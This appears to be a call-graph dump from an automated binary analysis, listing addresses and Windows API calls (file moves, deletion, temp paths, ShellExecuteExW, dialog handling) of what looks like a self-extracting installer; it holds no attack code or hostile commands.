24890 a3eb2e ShowWindow 24886->24890 24890->24883 24891 a3ea29 ShellExecuteExW 24891->24883 24894 a3ea3c 24891->24894 24893 a3ea21 24893->24891 24895 a3ea60 IsWindowVisible 24894->24895 24896 a3ea75 WaitForInputIdle 24894->24896 24897 a3eacb CloseHandle 24894->24897 24895->24896 24898 a3ea6b ShowWindow 24895->24898 24899 a3ed8b 6 API calls 24896->24899 24901 a3ead9 24897->24901 24902 a3eae4 24897->24902 24898->24896 24900 a3ea8d 24899->24900 24900->24897 24904 a3eaa0 GetExitCodeProcess 24900->24904 24932 a33316 CompareStringW 24901->24932 24902->24886 24904->24897 24905 a3eab3 24904->24905 24905->24897 24907->24857 24908->24857 24909->24872 24910->24857 24911->24857 24912->24857 24914 a4a6a4 24913->24914 24915 a4a6b1 24914->24915 24916 a4a6bc 24914->24916 24941 a4a7fe 24915->24941 24917 a4a6c4 24916->24917 24918 a4a6cd __dosmaperr 24916->24918 24920 a4a66a _free 20 API calls 24917->24920 24921 a4a6f7 HeapReAlloc 24918->24921 24922 a4a6d2 24918->24922 24949 a48e5c 7 API calls 2 library calls 24918->24949 24923 a4a6b9 24920->24923 24921->24918 24921->24923 24948 a4a7eb 20 API calls __dosmaperr 24922->24948 24923->24857 24926->24857 24933 a2b4d3 24927->24933 24930->24884 24931 a2cad4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24931->24893 24932->24902 24934 a3ffd0 24933->24934 24935 a2b4e0 GetFileAttributesW 24934->24935 24936 a2b4f1 24935->24936 24937 a2b4ca 24935->24937 24938 a2cf32 GetCurrentDirectoryW 24936->24938 24937->24891 24937->24931 24939 a2b505 24938->24939 24939->24937 24940 a2b509 GetFileAttributesW 24939->24940 24940->24937 24942 a4a83c 24941->24942 24946 a4a80c __dosmaperr 24941->24946 24951 a4a7eb 20 API calls __dosmaperr 24942->24951 24944 a4a827 RtlAllocateHeap 24945 a4a83a 24944->24945 24944->24946 24945->24923 24946->24942 24946->24944 24950 a48e5c 7 API calls 2 library calls 24946->24950 24948->24923 24949->24918 24950->24946 24951->24945 26098 a3bde0 73 API calls 26099 a505e1 21 API calls __vswprintf_c_l 26145 a473e0 QueryPerformanceFrequency QueryPerformanceCounter 26126 a4c66e 27 API calls _ValidateLocalCookies 26127 a3c2f3 78 API calls 26101 a3edf1 DialogBoxParamW 24960 a4ccf0 24961 a4ccf9 24960->24961 24962 a4cd02 24960->24962 24964 a4cbe7 24961->24964 24965 a4a515 _abort 38 API calls 24964->24965 24966 a4cbf4 24965->24966 24984 a4cd0e 24966->24984 24968 a4cbfc 24993 a4c97b 24968->24993 24971 a4cc13 24971->24962 24972 a4a7fe __vswprintf_c_l 21 API calls 24973 a4cc24 24972->24973 24983 a4cc56 24973->24983 25000 a4cdb0 24973->25000 24976 a4a66a _free 20 API calls 24976->24971 24977 a4cc51 25010 a4a7eb 20 API calls __dosmaperr 24977->25010 24979 a4cc9a 24979->24983 25011 a4c851 26 API calls 24979->25011 24980 a4cc6e 24980->24979 24981 a4a66a _free 20 API calls 24980->24981 24981->24979 24983->24976 24985 a4cd1a __FrameHandler3::FrameUnwindToState 24984->24985 24986 a4a515 _abort 38 API calls 24985->24986 24988 a4cd24 24986->24988 24989 a4cda8 _abort 24988->24989 24992 a4a66a _free 20 API calls 24988->24992 25012 a4a0f4 38 API calls _abort 24988->25012 25013 a4bdf1 EnterCriticalSection 24988->25013 25014 a4cd9f LeaveCriticalSection _abort 24988->25014 24989->24968 24992->24988 24994 a45944 __fassign 38 API calls 24993->24994 24995 a4c98d 24994->24995 24996 a4c99c GetOEMCP 24995->24996 24997 a4c9ae 24995->24997 24999 a4c9c5 24996->24999 24998 a4c9b3 GetACP 24997->24998 24997->24999 24998->24999 24999->24971 24999->24972 25001 a4c97b 40 API calls 25000->25001 25002 a4cdcf 25001->25002 25003 a4cdd6 25002->25003 25005 a4ce20 IsValidCodePage 25002->25005 25008 a4ce45 _abort 25002->25008 25004 a40d7c _ValidateLocalCookies 5 API calls 25003->25004 25006 a4cc49 25004->25006 25005->25003 25007 a4ce32 GetCPInfo 25005->25007 25006->24977 25006->24980 25007->25003 25007->25008 25015 a4ca53 GetCPInfo 25008->25015 25010->24983 25011->24983 25013->24988 25014->24988 25019 a4ca8d 25015->25019 25024 a4cb37 25015->25024 25018 a40d7c _ValidateLocalCookies 5 API calls 25021 a4cbe3 25018->25021 25025 a4db48 25019->25025 25021->25003 25023 a4bd38 __vswprintf_c_l 43 API calls 25023->25024 25024->25018 25026 a45944 __fassign 38 API calls 25025->25026 25027 a4db68 MultiByteToWideChar 25026->25027 25029 a4dba6 25027->25029 25030 a4dc3e 25027->25030 25033 a4a7fe __vswprintf_c_l 21 API calls 25029->25033 25036 a4dbc7 _abort __vsnwprintf_l 25029->25036 25031 a40d7c _ValidateLocalCookies 5 API calls 25030->25031 25034 a4caee 25031->25034 25032 a4dc38 25044 a4bd83 20 API calls _free 25032->25044 25033->25036 25039 a4bd38 25034->25039 25036->25032 25037 a4dc0c MultiByteToWideChar 25036->25037 25037->25032 25038 a4dc28 GetStringTypeW 25037->25038 25038->25032 25040 a45944 __fassign 38 API calls 25039->25040 25041 a4bd4b 25040->25041 25045 a4bb1b 25041->25045 25044->25030 25046 a4bb36 __vswprintf_c_l 25045->25046 25047 a4bb5c MultiByteToWideChar 25046->25047 25048 a4bb86 25047->25048 25049 a4bd10 25047->25049 25052 a4a7fe __vswprintf_c_l 21 API calls 25048->25052 25055 a4bba7 __vsnwprintf_l 25048->25055 25050 a40d7c _ValidateLocalCookies 5 API calls 25049->25050 25051 a4bd23 25050->25051 25051->25023 25052->25055 25053 a4bbf0 MultiByteToWideChar 25054 a4bc5c 25053->25054 25056 a4bc09 25053->25056 25081 a4bd83 20 API calls _free 25054->25081 25055->25053 25055->25054 25072 a4c12c 25056->25072 25060 a4bc33 25060->25054 25064 a4c12c __vswprintf_c_l 11 API calls 25060->25064 25061 a4bc6b 25062 a4a7fe __vswprintf_c_l 21 API calls 25061->25062 25067 a4bc8c __vsnwprintf_l 25061->25067 25062->25067 25063 a4bd01 25080 a4bd83 20 API calls _free 25063->25080 25064->25054 25065 a4c12c __vswprintf_c_l 11 API calls 25068 a4bce0 25065->25068 25067->25063 25067->25065 25068->25063 25069 a4bcef WideCharToMultiByte 25068->25069 25069->25063 25070 a4bd2f 25069->25070 25082 a4bd83 20 API calls _free 25070->25082 25073 a4be58 __dosmaperr 5 API calls 25072->25073 25074 a4c153 25073->25074 25076 a4c15c 25074->25076 25083 a4c1b4 10 API calls 3 library calls 25074->25083 25078 a40d7c _ValidateLocalCookies 5 API calls 25076->25078 25077 a4c19c LCMapStringW 25077->25076 25079 a4bc20 25078->25079 25079->25054 25079->25060 25079->25061 25080->25054 25081->25049 25082->25054 25083->25077 26070 a410f0 LocalFree 26102 a4d1f0 GetProcessHeap 25092 a213fd 43 API calls 2 library calls 26072 a4b8c0 21 API calls 26073 a49cc0 7 API calls ___scrt_uninitialize_crt 26103 a53dc0 VariantClear 26147 a503c0 51 API calls 25097 a3dfcc 25098 a3dfd5 GetTempPathW 25097->25098 25113 a3d8d8 _wcslen _wcsrchr 25097->25113 25103 a3dff5 25098->25103 25100 a24a20 _swprintf 51 API calls 25100->25103 25101 a3e54f 25102 a2b4c1 3 API calls 25102->25103 25103->25100 25103->25102 25104 a3e02c SetDlgItemTextW 25103->25104 25105 a3e049 25104->25105 25104->25113 25110 a3e12f EndDialog 25105->25110 25105->25113 25107 a3dbac SetWindowTextW 25107->25113 25110->25113 25111 a4521e 22 API calls 25111->25113 25113->25101 25113->25107 25113->25111 25114 a3d99a SetFileAttributesW 25113->25114 25126 a3d9b4 _abort _wcslen 25113->25126 25128 a33316 CompareStringW 25113->25128 25129 a3b65d GetCurrentDirectoryW 25113->25129 25131 a2b9ca 6 API calls 25113->25131 25132 a2b953 FindClose 25113->25132 25133 a3c67e 76 API calls 2 library calls 25113->25133 25134 a3c504 ExpandEnvironmentStringsW 25113->25134 25116 a3da54 GetFileAttributesW 25114->25116 25114->25126 25116->25113 25118 a3da66 DeleteFileW 25116->25118 25118->25113 25120 a3da77 25118->25120 25119 a3dd76 GetDlgItem SetWindowTextW SendMessageW 25119->25126 25121 a24a20 _swprintf 51 API calls 25120->25121 25123 a3da97 GetFileAttributesW 25121->25123 25122 a3ddb6 SendMessageW 25122->25113 25123->25120 25124 a3daac MoveFileW 25123->25124 25124->25113 25125 a3dac4 MoveFileExW 25124->25125 25125->25113 25126->25113 25126->25119 25126->25122 25127 a3da30 SHFileOperationW 25126->25127 25130 a2cdc0 51 API calls 2 library calls 25126->25130 25127->25116 25128->25113 25129->25113 25130->25126 25131->25113 25132->25113 25133->25113 25134->25113 25136 a3c9d0 25137 a3c9da __EH_prolog 25136->25137 25308 a212f6 25137->25308 25140 a3d10b 25394 a3e7ee 25140->25394 25141 a3ca1a 25144 a3ca8b 25141->25144 25145 a3ca28 25141->25145 25218 a3ca31 25141->25218 25148 a3cb1e GetDlgItemTextW 25144->25148 25154 a3caa1 25144->25154 25149 a3ca68 25145->25149 25150 a3ca2c 25145->25150 25146 a3d126 SendMessageW 25147 a3d134 25146->25147 25151 a3d14e GetDlgItem SendMessageW 25147->25151 25152 a3d13d SendDlgItemMessageW 25147->25152 25148->25149 25153 a3cb5b 25148->25153 25157 a3cb4f EndDialog 25149->25157 25149->25218 25155 a2f937 53 API calls 25150->25155 25150->25218 25412 a3b65d GetCurrentDirectoryW 25151->25412 25152->25151 25158 a3cb70 GetDlgItem 25153->25158 25306 a3cb64 25153->25306 25159 a2f937 53 API calls 25154->25159 25160 a3ca4b 25155->25160 25157->25218 25162 a3cba7 SetFocus 25158->25162 25163 a3cb84 SendMessageW SendMessageW 25158->25163 25164 a3cabe SetDlgItemTextW 25159->25164 25434 a2122f SHGetMalloc 25160->25434 25161 a3d17e GetDlgItem 25166 a3d1a1 SetWindowTextW 25161->25166 25167 a3d19b 25161->25167 25168 a3cbb7 25162->25168 25178 a3cbc3 25162->25178 25163->25162 25169 a3cac9 25164->25169 25413 a3bbc0 GetClassNameW 25166->25413 25167->25166 25172 a2f937 53 API calls 25168->25172 25176 a3cad6 GetMessageW 25169->25176 25169->25218 25170 a3d051 25174 a2f937 53 API calls 25170->25174 25173 a3cbc1 25172->25173 25318 a3e619 25173->25318 25180 a3d061 SetDlgItemTextW 25174->25180 25177 a3caed IsDialogMessageW 25176->25177 25176->25218 25177->25169 25182 a3cafc TranslateMessage DispatchMessageW 25177->25182 25186 a2f937 53 API calls 25178->25186 25179 a3d3f8 SetDlgItemTextW 25179->25218 25184 a3d075 25180->25184 25182->25169 25190 a2f937 53 API calls 25184->25190 25189 a3cbfa 25186->25189 25187 a3cc1d 25191 a3cc51 25187->25191 25195 a2b4c1 3 API calls 25187->25195 25188 a3d1ec 25193 a3d21c 25188->25193 25196 a2f937 53 API calls 25188->25196 25194 a24a20 _swprintf 51 API calls 25189->25194 25222 a3d098 _wcslen 25190->25222 25338 a2b341 25191->25338 25192 a3d884 98 API calls 25192->25188 25201 a3d884 98 API calls 25193->25201 25243 a3d2d4 25193->25243 25194->25173 25198 a3cc47 25195->25198 25199 a3d1ff SetDlgItemTextW 25196->25199 25198->25191 25328 a3beff 25198->25328 25206 a2f937 53 API calls 25199->25206 25209 a3d237 25201->25209 25202 a3d387 25203 a3d390 EnableWindow 25202->25203 25204 a3d399 25202->25204 25203->25204 25210 a3d3b6 25204->25210 25443 a212b3 GetDlgItem KiUserCallbackDispatcher 25204->25443 25205 a3d0e9 25213 a2f937 53 API calls 25205->25213 25212 a3d213 SetDlgItemTextW 25206->25212 25207 a3cc6a GetLastError 25208 a3cc75 25207->25208 25344 a3bc19 SetCurrentDirectoryW 25208->25344 25220 a3d249 25209->25220 25242 a3d26e 25209->25242 25217 a3d3dd 25210->25217 25231 a3d3d5 SendMessageW 25210->25231 25212->25193 25213->25218 25215 a3d2c7 25223 a3d884 98 API calls 25215->25223 25217->25218 25227 a2f937 53 API calls 25217->25227 25219 a3cc89 25224 a3cca0 25219->25224 25225 a3cc92 GetLastError 25219->25225 25441 a3aef5 32 API calls 25220->25441 25221 a3d3ac 25444 a212b3 GetDlgItem KiUserCallbackDispatcher 25221->25444 25222->25205 25230 a2f937 53 API calls 25222->25230 25223->25243 25233 a3ccb0 GetTickCount 25224->25233 25234 a3cd26 25224->25234 25283 a3cd17 25224->25283 25225->25224 25232 a3ca52 25227->25232 25228 a3d262 25228->25242 25235 a3d0cc 25230->25235 25231->25217 25232->25179 25232->25218 25241 a24a20 _swprintf 51 API calls 25233->25241 25238 a3cef7 25234->25238 25239 a3cd3f GetModuleFileNameW 25234->25239 25240 a3ceed 25234->25240 25244 a24a20 _swprintf 51 API calls 25235->25244 25236 a3d365 25442 a3aef5 32 API calls 25236->25442 25237 a3cf52 25353 a212d1 GetDlgItem ShowWindow 25237->25353 25251 a2f937 53 API calls 25238->25251 25435 a305ed 82 API calls 25239->25435 25240->25149 25240->25238 25247 a3cccd 25241->25247 25242->25215 25252 a3d884 98 API calls 25242->25252 25243->25202 25243->25236 25248 a2f937 53 API calls 25243->25248 25244->25205 25345 a2a8ce 25247->25345 25248->25243 25249 a3d384 25249->25202 25256 a3cf01 25251->25256 25257 a3d29c 25252->25257 25253 a3cf62 25354 a212d1 GetDlgItem ShowWindow 25253->25354 25255 a3cd67 25259 a24a20 _swprintf 51 API calls 25255->25259 25260 a24a20 _swprintf 51 API calls 25256->25260 25257->25215 25261 a3d2a5 DialogBoxParamW 25257->25261 25258 a3cf6c 25262 a2f937 53 API calls 25258->25262 25263 a3cd89 CreateFileMappingW 25259->25263 25264 a3cf1f 25260->25264 25261->25149 25261->25215 25266 a3cf76 SetDlgItemTextW 25262->25266 25268 a3ce5e __InternalCxxFrameHandler 25263->25268 25269 a3cde7 GetCommandLineW 25263->25269 25277 a2f937 53 API calls 25264->25277 25355 a212d1 GetDlgItem ShowWindow 25266->25355 25267 a3ccf3 25273 a3ccfa GetLastError 25267->25273 25274 a3cd05 25267->25274 25271 a3ce69 ShellExecuteExW 25268->25271 25272 a3cdf8 25269->25272 25285 a3ce84 25271->25285 25436 a3c615 SHGetMalloc 25272->25436 25273->25274 25276 a2a801 80 API calls 25274->25276 25275 a3cf88 SetDlgItemTextW GetDlgItem 25279 a3cfa5 GetWindowLongW SetWindowLongW 25275->25279 25280 a3cfbd 25275->25280 25276->25283 25281 a3cf39 25277->25281 25279->25280 25356 a3d884 25280->25356 25282 a3ce14 25437 a3c615 SHGetMalloc 25282->25437 25283->25234 25283->25237 25290 a3cec7 25285->25290 25291 a3ce99 WaitForInputIdle 25285->25291 25288 a3ce20 25438 a3c615 SHGetMalloc 25288->25438 25289 a3d884 98 API calls 25293 a3cfd9 25289->25293 25290->25240 25299 a3cedd UnmapViewOfFile CloseHandle 25290->25299 25294 a3ceae 25291->25294 25382 a3eba2 25293->25382 25294->25290 25298 a3ceb3 Sleep 25294->25298 25295 a3ce2c 25439 a3069c 82 API calls 25295->25439 25298->25290 25298->25294 25299->25240 25300 a3ce3d MapViewOfFile 25300->25268 25302 a3d884 98 API calls 25305 a3cfff 25302->25305 25303 a3d028 25440 a212b3 GetDlgItem KiUserCallbackDispatcher 25303->25440 25305->25303 25307 a3d884 98 API calls 25305->25307 25306->25149 25306->25170 25307->25303 25309 a21358 25308->25309 25310 a212ff 25308->25310 25446 a2f5e1 GetWindowLongW SetWindowLongW 25309->25446 25312 a21365 25310->25312 25445 a2f608 62 API calls 2 library calls 25310->25445 25312->25140 25312->25141 25312->25218 25314 a21321 25314->25312 25315 a21334 GetDlgItem 25314->25315 25315->25312 25316 a21344 25315->25316 25316->25312 25317 a2134a SetWindowTextW 25316->25317 25317->25312 25319 a3c758 5 API calls 25318->25319 25320 a3e625 GetDlgItem 25319->25320 25321 a3e647 25320->25321 25322 a3e67b SendMessageW SendMessageW 25320->25322 25325 a3e652 ShowWindow SendMessageW SendMessageW 25321->25325 25323 a3e6b7 25322->25323 25324 a3e6d6 SendMessageW SendMessageW SendMessageW 25322->25324 25323->25324 25326 a3e709 SendMessageW 25324->25326 25327 a3e72c SendMessageW 25324->25327 25325->25322 25326->25327 25327->25187 25447 a3c324 GetCurrentProcess OpenProcessToken 25328->25447 25330 a3bf14 25331 a3bfad 25330->25331 25332 a3bf1c SetEntriesInAclW 25330->25332 25331->25191 25332->25331 25333 a3bf60 InitializeSecurityDescriptor 25332->25333 25334 a3bf9f 25333->25334 25335 a3bf6f SetSecurityDescriptorDacl 25333->25335 25334->25331 25337 a3bfa4 LocalFree 25334->25337 25335->25334 25336 a3bf82 CreateDirectoryW 25335->25336 25336->25334 25337->25331 25341 a2b34b 25338->25341 25339 a2b3dc 25340 a2b542 8 API calls 25339->25340 25342 a2b405 25339->25342 25340->25342 25341->25339 25341->25342 25454 a2b542 25341->25454 25342->25207 25342->25208 25344->25219 25346 a2a8d8 25345->25346 25347 a2a935 CreateFileW 25346->25347 25348 a2a929 25346->25348 25347->25348 25349 a2a97f 25348->25349 25350 a2cf32 GetCurrentDirectoryW 25348->25350 25349->25267 25351 a2a964 25350->25351 25351->25349 25352 a2a968 CreateFileW 25351->25352 25352->25349 25353->25253 25354->25258 25355->25275 25357 a3d88e __EH_prolog 25356->25357 25358 a3cfcb 25357->25358 25475 a3c504 ExpandEnvironmentStringsW 25357->25475 25358->25289 25362 a3dbac SetWindowTextW 25367 a3d8c5 _wcslen _wcsrchr 25362->25367 25365 a4521e 22 API calls 25365->25367 25367->25358 25367->25362 25367->25365 25368 a3d99a SetFileAttributesW 25367->25368 25380 a3d9b4 _abort _wcslen 25367->25380 25476 a33316 CompareStringW 25367->25476 25477 a3b65d GetCurrentDirectoryW 25367->25477 25479 a2b9ca 6 API calls 25367->25479 25480 a2b953 FindClose 25367->25480 25481 a3c67e 76 API calls 2 library calls 25367->25481 25482 a3c504 ExpandEnvironmentStringsW 25367->25482 25370 a3da54 GetFileAttributesW 25368->25370 25368->25380 25370->25367 25372 a3da66 DeleteFileW 25370->25372 25372->25367 25374 a3da77 25372->25374 25373 a3dd76 GetDlgItem SetWindowTextW SendMessageW 25373->25380 25375 a24a20 _swprintf 51 API calls 25374->25375 25377 a3da97 GetFileAttributesW 25375->25377 25376 a3ddb6 SendMessageW 25376->25367 25377->25374 25378 a3daac MoveFileW 25377->25378 25378->25367 25379 a3dac4 MoveFileExW 25378->25379 25379->25367 25380->25367 25380->25373 25380->25376 25381 a3da30 SHFileOperationW 25380->25381 25478 a2cdc0 51 API calls 2 library calls 25380->25478 25381->25370 25383 a3ebac __EH_prolog 25382->25383 25483 a31983 25383->25483 25385 a3ebdd 25487 a264ed 25385->25487 25387 a3ebfb 25491 a28823 25387->25491 25391 a3ec4e 25509 a2890a 25391->25509 25393 a3cfea 25393->25302 25395 a3e7f8 25394->25395 25396 a3b5d6 4 API calls 25395->25396 25397 a3e7fd 25396->25397 25398 a3e805 GetWindow 25397->25398 25399 a3d111 25397->25399 25398->25399 25402 a3e825 25398->25402 25399->25146 25399->25147 25400 a3e832 GetClassNameW 26034 a33316 CompareStringW 25400->26034 25402->25399 25402->25400 25403 a3e856 GetWindowLongW 25402->25403 25404 a3e8ba GetWindow 25402->25404 25403->25404 25405 a3e866 SendMessageW 25403->25405 25404->25399 25404->25402 25405->25404 25406 a3e87c GetObjectW 25405->25406 26035 a3b615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25406->26035 25408 a3e893 26036 a3b5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25408->26036 26037 a3b81c 8 API calls 25408->26037 25411 a3e8a4 SendMessageW DeleteObject 25411->25404 25412->25161 25414 a3bbe1 25413->25414 25415 a3bc06 25413->25415 26038 a33316 CompareStringW 25414->26038 25416 a3bc14 25415->25416 25417 a3bc0b SHAutoComplete 25415->25417 25421 a3c217 25416->25421 25417->25416 25419 a3bbf4 25419->25415 25420 a3bbf8 FindWindowExW 25419->25420 25420->25415 25422 a3c221 __EH_prolog 25421->25422 25423 a213f8 43 API calls 25422->25423 25424 a3c243 25423->25424 26039 a22083 25424->26039 25427 a3c25d 25429 a21641 86 API calls 25427->25429 25428 a3c26c 25430 a21a7e 143 API calls 25428->25430 25431 a3c268 25429->25431 25433 a3c28b __InternalCxxFrameHandler ___std_exception_copy 25430->25433 25431->25188 25431->25192 25432 a21641 86 API calls 25432->25431 25433->25432 25434->25232 25435->25255 25436->25282 25437->25288 25438->25295 25439->25300 25440->25306 25441->25228 25442->25249 25443->25221 25444->25210 25445->25314 25446->25312 25448 a3c344 GetTokenInformation 25447->25448 25452 a3c39b 25447->25452 25449 a3c369 ___std_exception_copy 25448->25449 25450 a3c35e GetLastError 25448->25450 25451 a3c372 GetTokenInformation 25449->25451 25450->25449 25450->25452 25451->25452 25453 a3c38c CopySid 25451->25453 25452->25330 25453->25452 25455 a2b54f 25454->25455 25456 a2b573 25455->25456 25457 a2b566 CreateDirectoryW 25455->25457 25458 a2b4c1 3 API calls 25456->25458 25457->25456 25459 a2b5a6 25457->25459 25460 a2b579 25458->25460 25462 a2b5b5 25459->25462 25467 a2b8e6 25459->25467 25461 a2b5b9 GetLastError 25460->25461 25464 a2cf32 GetCurrentDirectoryW 25460->25464 25461->25462 25462->25341 25465 a2b58f 25464->25465 25465->25461 25466 a2b593 CreateDirectoryW 25465->25466 25466->25459 25466->25461 25468 a3ffd0 25467->25468 25469 a2b8f3 SetFileAttributesW 25468->25469 25470 a2b936 25469->25470 25471 a2b909 25469->25471 25470->25462 25472 a2cf32 GetCurrentDirectoryW 25471->25472 25473 a2b91d 25472->25473 25473->25470 25474 a2b921 SetFileAttributesW 25473->25474 25474->25470 25475->25367 25476->25367 25477->25367 25478->25380 25479->25367 25480->25367 25481->25367 25482->25367 25484 a31990 _wcslen 25483->25484 25518 a21895 25484->25518 25486 a319a8 25486->25385 25488 a31983 _wcslen 25487->25488 25489 a21895 78 API calls 25488->25489 25490 a319a8 25489->25490 25490->25387 25492 a2882d __EH_prolog 25491->25492 25531 a2e298 25492->25531 25494 a28855 25495 a3febe 27 API calls 25494->25495 25496 a28899 _abort 25495->25496 25497 a3febe 27 API calls 25496->25497 25498 a288c0 25497->25498 25541 a35c64 25498->25541 25501 a28a38 25503 a28a42 25501->25503 25502 a28ab5 25506 a28b1a 25502->25506 25562 a290a2 25502->25562 25503->25502 25584 a2b966 25503->25584 25505 a28b5c 25505->25391 25506->25505 25590 a21397 74 API calls 25506->25590 26030 a2a41a 25509->26030 25511 a2892b 25512 a33546 86 API calls 25511->25512 25513 a2893c Concurrency::cancel_current_task 25511->25513 25512->25513 25514 a22111 26 API calls 25513->25514 25515 a28963 25514->25515 25516 a2e339 86 API calls 25515->25516 25517 a2896b 25516->25517 25517->25393 25519 a218a7 25518->25519 25526 a218ff 25518->25526 25520 a218d0 25519->25520 25528 a276e9 76 API calls __vswprintf_c_l 25519->25528 25522 a4521e 22 API calls 25520->25522 25524 a218f0 25522->25524 25523 a218c6 25529 a2775a 75 API calls 25523->25529 25524->25526 25530 a2775a 75 API calls 25524->25530 25526->25486 25528->25523 25529->25520 25530->25526 25532 a2e2a2 __EH_prolog 25531->25532 25533 a3febe 27 API calls 25532->25533 25534 a2e2e5 25533->25534 25535 a2e2f8 25534->25535 25547 a26891 25534->25547 25537 a3febe 27 API calls 25535->25537 25538 a2e309 25537->25538 25539 a2e31c 25538->25539 25540 a26891 41 API calls 25538->25540 25539->25494 25540->25539 25542 a35c6e __EH_prolog 25541->25542 25543 a3febe 27 API calls 25542->25543 25544 a35c8a 25543->25544 25545 a288f2 25544->25545 25561 a32166 80 API calls 25544->25561 25545->25501 25548 a2689b __EH_prolog 25547->25548 25553 a40023 25548->25553 25550 a268b7 25551 a40023 41 API calls 25550->25551 25552 a268d9 _abort 25551->25552 25552->25535 25554 a4002f __FrameHandler3::FrameUnwindToState 25553->25554 25555 a4005a 25554->25555 25557 a26920 25554->25557 25555->25550 25558 a2692a __EH_prolog 25557->25558 25559 a304e5 41 API calls 25558->25559 25560 a26936 25559->25560 25560->25554 25561->25545 25563 a290ac __EH_prolog 25562->25563 25591 a213f8 25563->25591 25565 a290c8 25566 a290d9 25565->25566 25755 a2b1d2 25565->25755 25570 a29110 25566->25570 25603 a21ad3 25566->25603 25569 a2910c 25569->25570 25622 a22032 25569->25622 25747 a21641 25570->25747 25574 a291b2 25626 a2924e 25574->25626 25577 a29211 25577->25570 25634 a24264 25577->25634 25646 a292c6 25577->25646 25582 a2b966 7 API calls 25583 a29139 25582->25583 25583->25574 25583->25582 25759 a2d4d2 CompareStringW _wcslen 25583->25759 25585 a2b97b 25584->25585 25589 a2b9a9 25585->25589 26019 a2ba94 25585->26019 25587 a2b98b 25588 a2b990 FindClose 25587->25588 25587->25589 25588->25589 25589->25503 25590->25505 25592 a213fd __EH_prolog 25591->25592 25593 a26891 41 API calls 25592->25593 25594 a21428 25593->25594 25595 a2e298 41 API calls 25594->25595 25596 a21437 25595->25596 25597 a3febe 27 API calls 25596->25597 25601 a214ab 25596->25601 25599 a21498 25597->25599 25599->25601 25602 a2644d 43 API calls 25599->25602 25600 a21533 _abort 25600->25565 25760 a2c1f7 25601->25760 25602->25601 25604 a21add __EH_prolog 25603->25604 25616 a21b30 25604->25616 25619 a21c63 25604->25619 25778 a213d9 25604->25778 25606 a21c9e 25781 a21397 74 API calls 25606->25781 25609 a24264 116 API calls 25613 a21ce9 25609->25613 25610 a21cab 25610->25609 25610->25619 25611 a21d31 25615 a21d64 25611->25615 25611->25619 25782 a21397 74 API calls 25611->25782 25613->25611 25614 a24264 116 API calls 25613->25614 25614->25613 25615->25619 25620 a2b110 79 API calls 25615->25620 25616->25606 25616->25610 25616->25619 25617 a24264 116 API calls 25618 a21db5 25617->25618 25618->25617 25618->25619 25619->25569 25620->25618 25621 a2b110 79 API calls 25621->25616 25624 a22037 __EH_prolog 25622->25624 25623 a22068 25623->25583 25624->25623 25796 a21a7e 25624->25796 25919 a2e395 25626->25919 25628 a2925e 25923 a32701 GetSystemTime SystemTimeToFileTime 25628->25923 25630 a291cc 25630->25577 25631 a32eb4 25630->25631 25928 a3efab 25631->25928 25635 a24270 25634->25635 25636 a24274 25634->25636 25635->25577 25645 a2b110 79 API calls 25636->25645 25637 a24286 25638 a242a1 25637->25638 25639 a242af 25637->25639 25644 a242e1 25638->25644 25936 a2395a 104 API calls 3 library calls 25638->25936 25937 a22eb6 116 API calls 3 library calls 25639->25937 25642 a242ad 25642->25644 25938 a22544 74 API calls 25642->25938 25644->25577 25645->25637 25647 a292d0 __EH_prolog 25646->25647 25650 a2930e 25647->25650 25657 a2973d Concurrency::cancel_current_task 25647->25657 25957 a39cad 118 API calls 25647->25957 25649 a2a18d 25651 a2a192 25649->25651 25652 a2a1c5 25649->25652 25650->25649 25655 a2932f 25650->25655 25650->25657 25651->25657 25987 a28675 168 API calls 25651->25987 25652->25657 25988 a39cad 118 API calls 25652->25988 25655->25657 25939 a266df 25655->25939 25657->25577 25658 a29405 25659 a29545 25658->25659 25958 a2b5d6 57 API calls 3 library calls 25658->25958 25659->25657 25665 a29669 25659->25665 25960 a28f6b 38 API calls 25659->25960 25663 a295ac 25959 a48a18 26 API calls ___std_exception_copy 25663->25959 25667 a2b966 7 API calls 25665->25667 25669 a296db 25665->25669 25667->25669 25668 a29935 25967 a2e4a9 96 API calls 25668->25967 25945 a289c8 25669->25945 25672 a2976c 25696 a297c5 25672->25696 25961 a24727 41 API calls 2 library calls 25672->25961 25675 a29990 25676 a29a3a 25675->25676 25682 a299bb 25675->25682 25679 a29a8c 25676->25679 25694 a29a45 25676->25694 25686 a29a2c 25679->25686 25971 a28db3 119 API calls 25679->25971 25680 a29a8a 25687 a2a801 80 API calls 25680->25687 25681 a2a14a 25688 a2a801 80 API calls 25681->25688 25683 a29ae8 25682->25683 25682->25686 25689 a2b4c1 3 API calls 25682->25689 25683->25681 25684 a29b53 25683->25684 25972 a2ab1c 25683->25972 25692 a2bf0a 27 API calls 25684->25692 25686->25680 25686->25683 25687->25657 25688->25657 25690 a299f3 25689->25690 25690->25686 25969 a2a50a 97 API calls 25690->25969 25695 a29ba2 25692->25695 25694->25680 25970 a28b7c 123 API calls 25694->25970 25700 a2bf0a 27 API calls 25695->25700 25696->25657 25697 a298ed 25696->25697 25703 a298f4 Concurrency::cancel_current_task 25696->25703 25962 a287fb 41 API calls 25696->25962 25963 a2e4a9 96 API calls 25696->25963 25964 a2237a 74 API calls 25696->25964 25965 a28f28 99 API calls 25696->25965 25966 a2237a 74 API calls 25697->25966 25718 a29bb8 25700->25718 25703->25675 25968 a2851f 50 API calls 2 library calls 25703->25968 25705 a29b41 25976 a27951 77 API calls 25705->25976 25707 a29c8b 25708 a29ce7 25707->25708 25709 a29e85 25707->25709 25710 a29cff 25708->25710 25717 a29da7 25708->25717 25711 a29e97 25709->25711 25712 a29eab 25709->25712 25733 a29d20 25709->25733 25713 a29d46 25710->25713 25720 a29d0e 25710->25720 25715 a2a475 138 API calls 25711->25715 25714 a34586 75 API calls 25712->25714 25713->25733 25979 a2829b 112 API calls 25713->25979 25716 a29ec4 25714->25716 25715->25733 25983 a3422f 138 API calls 25716->25983 25980 a28f6b 38 API calls 25717->25980 25718->25707 25719 a29c62 25718->25719 25727 a2aa7a 79 API calls 25718->25727 25719->25707 25977 a2ac9c 82 API calls 25719->25977 25978 a2237a 74 API calls 25720->25978 25725 a29e76 25725->25577 25727->25719 25728 a29dec 25729 a29e08 25728->25729 25730 a29e1f 25728->25730 25728->25733 25981 a28037 85 API calls 25729->25981 25982 a2a212 103 API calls __EH_prolog 25730->25982 25733->25725 25736 a29fca 25733->25736 25984 a2237a 74 API calls 25733->25984 25735 